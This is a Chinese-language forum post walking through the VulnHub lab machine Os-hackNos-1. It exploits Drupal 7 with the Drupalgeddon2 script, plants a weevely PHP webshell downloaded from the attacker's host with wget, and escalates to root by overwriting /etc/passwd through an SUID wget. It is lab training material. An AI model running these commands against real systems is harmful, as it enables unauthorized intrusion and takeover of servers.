论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
Os-hackNos-1
Os-hackNos-1
羊蹓狼
金牌会员
|
2024-5-15 18:26:45
|
显示全部楼层
|
阅读模式
楼主
主题
886
|
帖子
886
|
积分
2658
一、环境搭建
实验主机:kali-linux 2023 虚拟机(VM)
实验靶机:Os-hackNos-1 靶机(VM)
实验网络:桥接模式
flag:1.平凡用户的user.txt;2.root用户的user.txt
技能:漏洞利用 | web应用 | 暴力破解 | 权限提升
靶机下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
二、信息收集
主机发现:
确认自己的信息
1 ifconfig
复制代码
探测网段存活主机
1 nmap -sP 192.168.133.0/24
复制代码
也可以利用如下命令
1 netdiscover -i eth0 -r 192.168.133.0/24
复制代码
端口扫描:
探测操作体系及软件版本信息
1 nmap -sTV -p- -Pn 192.168.133.97
复制代码
经过探测发现开放22端口和80端口
1 22 端口 :SSH 服务端口,可能存在弱口令和暴力破解
2 80 端口 :HTTP 端口,可以通过目录扫描,去发现网站目录或者网站源码泄露或者备份文件泄露
复制代码
访问一下80端口
目录探测:
探测一下网站目录信息
1 dirb http://192.168.133.97
复制代码
可以看到网站CMS为drupal7,存在远程代码实行的漏洞,利用kali的msf模块,搜刮drupal对应的exp
三、漏洞发现
CMS版本为drupal7,搜刮一下关于该版本的CMS漏洞
四、漏洞利用
1 将脚本拷贝下来
2 git clone https://github.com/dreadlocked/Drupalgeddon2.git
3
4 在运行脚本前,需要预装依赖包 highline
5 gem install highline
6
7 执行脚本
8 ruby drupalgeddon2.rb http://192.168.133.97/drupal/
复制代码
查看权限
查看目录文件
五、权限提升
利用weevely(kali 菜刀)
利用weevely 天生木马,再将木马上传到靶机上
1 生成木马:
2 weevely generate hello ./door.php
3
4 打开kali web服务器:
5 python -m http.server 80
6
7 在靶机上使用wget工具下载 kali 上生成的木马文件:
8 wget http://192.168.133.125:80/door.php
复制代码
利用weevely天生的木马内容
连接靶机,留意此处权限和路径问题会导致连接失败
1 weevely http://192.168.133.97/drupal/door.php hello
复制代码
浏览用户目录
查看是否存在有用的信息
1 cd /home
2 ls -lh
3 cd james/
4 ls -lh
5 cat user.txt
复制代码
在 james 用户目录下发现一串MD5哈希值,解码失败
1 bae11ce4f67af91fa58576c1da2aad4b
复制代码
浏览一下网站根目录,发现其他文件
解码之后再次利用Brainfuck解码
得到:james:Hacker@4514
切换用户
尝试切换用户,发现不能切换用户
suid 提权
检查哪些命令具有suid权限(具有suid权限的命令可以以文件拥有者的权限实行)
1 audit_suidsgid -only-suid /
复制代码
看到拥有wget的权限,这里的思路是把/etc/passwd的文件下载下来,然后添加一个具有root权限的用户,再传回去覆盖它。首先进行创建一个用户
1 openssl passwd -1 -salt 账号 密码
复制代码
搭建web服务器,把靶机上的/etc/passwd下载下来
然后将刚才创建的用户加入进去,并在kali上开一个web服务器,用靶机连接下载已经更改的/ect/passwd去覆盖掉原来的文件即可
然后查看靶机上是否有新增账户,发现lxx账号信息即创建乐成
切换失败,此方法行不通
利用metasploit
搜刮漏洞组件
选择利用的工具模块,并设置相关参数
查看设置参数
攻击乐成后,表现没有交互式shell,需要提升为交互式shell
1 python3 -c "import pty;pty.spawn('/bin/bash')"
复制代码
得到权限后切换用户,再次失败
错误总结
最终结合经验发现,写入新建的账户有问题,即覆盖的root权限的用户创建失败
更改为admin账户后,在metasploit得到权限后即可切换用户
末了进入/root 目录下查看root.txt 完成测试
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
羊蹓狼
金牌会员
这个人很懒什么都没写!
楼主热帖
让你成为网络世界中有破坏力的人-HTTP ...
一文带你走进【内存泄漏】
dolphinscheduler单机化改造
day01-Tomcat框架分析
保举开源项目:LuCI App AdGuardHome - ...
一文搞懂static
深入理解并发编程同步工具类 ...
邮件管理数据库设计--MySQL
3. 视图-触发器-存储过程-索引 ...
基于 Sealos 的镜像构建能力,快速部署 ...
标签云
存储
挺好的
服务器
快速回复
返回顶部
返回列表